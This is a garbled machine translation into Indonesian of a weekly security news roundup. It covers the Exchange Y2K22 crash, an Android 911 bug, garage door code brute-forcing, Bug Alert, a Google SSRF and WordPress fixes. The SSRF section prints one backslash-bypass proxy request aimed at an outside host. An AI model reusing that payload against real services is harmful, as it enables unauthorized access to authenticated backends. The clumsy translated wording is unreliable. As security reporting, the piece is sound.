INI MINGGU DI KEAMANAN: Y2K22, tidak sengaja PEMBLOKIRAN 911, serta BUG ALERT

Jika Anda memiliki kemalangan menjalankan exchange server Microsoft minggu terakhir ini, maka Anda tidak persyaratan saya untuk memberitahu Anda tentang masalah Y2K22 . Untuk sisa tangkapan kami, ketika pertukaran mencoba untuk men-download malware definisi pembaruan pertama dari 2022, nomor versi definisi baru memicu kecelakaan di mesin deteksi malware. Tanggal tersebut direpresentasikan sebagai string 2201010001, di mana dua digit pertama mewakili tahun. string ini akan dikonversi menjadi integer panjang ditandatangani, yang maxes keluar pada 2147483647. integer meluap, serta hasilnya adalah perilaku undefined, menabrak mesin. Server berhenti aman bekerja, tidak memproses jenis pesan tanpa mesin malware bekerja, yang berarti bahwa tidak ada e-mail akan melalui. senang tahun baru!

Android 911 Denial of Service

Panggilan 911 untuk layanan darurat cukup banyak waktu terburuk untuk bug aplikasi perangkat lunak mewujud. Google hanya tetap bug tersebut dalam update Januari Android. Ini salah satu yang aneh interaksi aplikasi yang tidak disengaja – dalam situasi ini tim Microsoft memicu bug Android. Jika aplikasi tim diinstal, namun tidak ada akun login, tim menghasilkan serta register item PhoneAccount baru pada setiap peluncuran. Hal ini tampaknya seperti itu seharusnya langka, namun tim pada Android adalah juga terkenal untuk keluar log individu secara spontan. Ketika Anda menghubungi 911, Android berjalan rutin untuk mengidentifikasi PhoneAccount harus dimanfaatkan untuk jalan panggilan, serta hubungan memecahkan dengan membandingkan hash. perbandingan itu hanya pengurangan naif, menyiratkan bahwa ada kemungkinan 50% dalam mendapatkan hasil yang kurang baik. Ini adalah tak terduga, yang mengarah ke kecelakaan.

Pintu Garasi terbalik Teknik

reverse engineering rencana otorisasi nirkabel 30 tahun mungkin bukan prestasi paling menarik grabbing, namun dalam beberapa kasus perjalanan adalah hadiah sendiri. [Maxwell Dulin] membawa kita cerita, serta perjalanan ini pasti worth it. Dasar-dasar hack ini tentu masih layak, dimulai dengan mengambil melihat perangkat keras. Pintu garasi disinkronisasikan ke pintu pembuka garasi dengan menahan tombol tekan pada penerima saat mengirim kode. dalam pembuka, ada sembilan switch dip, masing-masing dengan tiga posisi. Apa yang mereka lakukan? Dia mengeluarkan SDR diandalkan untuk mendapatkan lalu lintas web serta mencoba untuk decode sinyal. InSpectrum serta GNU Radio adalah pahlawan di sini, memberikan wawasan ke dalam skema auth mudah ini. Final pemikiran pada pintu garasi yang sebenarnya ini? Anda dapat brute force kode yang tidak diketahui dengan mengirimkan setiap combo mungkin, serta hanya membutuhkan waktu 104 menit.

BugAlert

Jika Anda sysadmin, Anda memahami bahwa beberapa masalah panggilan telepon untuk tindakan instan. Jika Anda berlari server Java, kerentanan Log4J merupakan ujian mengakhiri protokol reaksi Anda. waktu antara pengungkapan publik serta setiap kali Anda mendengar tentang hal itu, mungkin sudah cukup untuk berangkat bencana. Saat ini ada beberapa layanan pelaporan bug serta kerangka kerja, tidak ada yang lebih cocok ceruk ini memanfaatkan kasus: memberitahukan Anda sesegera mungkin bahwa rambut Anda mungkin benar-benar terbakar. Niche terisi disadap [Matius Sullivan], yang telah mengungkapkan proyek baru, Bug Alert. Ini semua open source, sehingga Anda dapat memegang contoh Anda sendiri jika Anda benar-benar ingin. Anda dapat memilih untuk mendapatkan tweet, teks, atau panggilan telepon bahkan. Ini memiliki potensi untuk menjadi alat yang bermanfaat, kita lihat!

Saya merasa seperti saya persyaratan untuk membuat Bug Alert set off Al lagu yang aneh tertentu …

The Zombie SSRF

[David Schütz] sedang mencari jelas Google API, serta ditemukan jobs.googleapis.com, yang dapat Anda demo sendiri. Demo yang menarik, karena bukan layanan sepenuhnya fleshed-keluar, namun berbicara dengan tulus back-end. Permintaan pergi dengan proxy, cxl-services.appspot.com, yang menangani langkah otentikasi untuk halaman demo. Jika ia mungkin memicu permintaan Server-Side Pemalsuan (SSRF), ia mungkin bisa mendapatkan di permintaan dikonfirmasi, serta mungkin teknik proxy menjadi mengirimkan lalu lintas web atas namanya. URL parsing sulit. Teknik yang bekerja? Sebuah garis miring terbalik di url. get /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ HTTP / 1.1

Dengan akses keuntungan untuk tanda tangan, [David] mulai secara menyeluruh memeriksa Google API lain untuk melihat apa token ini memberinya mendapatkan akses ke ke. Dia menyediakan memperingatkan kita telah membahas sebelumnya, berhati-hati persis seberapa jauh Anda mendorong. Dia mungkin telah melaporkan bug yang terbaik pergi, namun ingin memverifikasi bahwa ia benar-benar memiliki akses keuntungan online untuk token. Setelah mengkonfirmasi token membantu diperiksa akses, ia berbalik dalam temuan, serta terjaring sebuah sangat baik $ 3.133,70, selain tambahan $ 1000 untuk laporan besar serta tampilan berhati-hati pada gerakan lateral. Itu semua ada untuk itu, kan? Tidak. sebelum batas waktu pengungkapan 90 hari berlalu, [David] menemukan bypass perbaikan. addiNg semua jenis teks antara backslash serta @ cukup untuk memecahnya. Satu lagi $ 3133.70. Hanya untuk bersenang-senang, dia menyelidiki URL lama, itu seharusnya tidak berfungsi setelah perbaikan. Yap, dia menemukan satu lagi token keselamatan dan keamanan, serta berjarut $ 3133,70. SSRF zombie ini masih belum mati, sebagaimana dibuktikan pada Twitter:

Pembaruan wordpress.

Jika Anda belum menetapkan instance WordPress untuk memperbarui secara otomatis, saatnya untuk memeriksa versi terbaru. Ada empat masalah yang berpotensi berbahaya di sini, meskipun detailnya langka pada saat ini. Sangat pertama adalah kerentanan skrip lintas situs dalam mempublikasikan siput, bagian dari URL yang cocok dengan nama penerbitan. Masalah kedua yang dibahas adalah injeksi item dalam beberapa konfigurasi multisit. Dua kerentanan terakhir adalah suntikan SQL, tentu layak untuk “tahun berapa?” .

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Post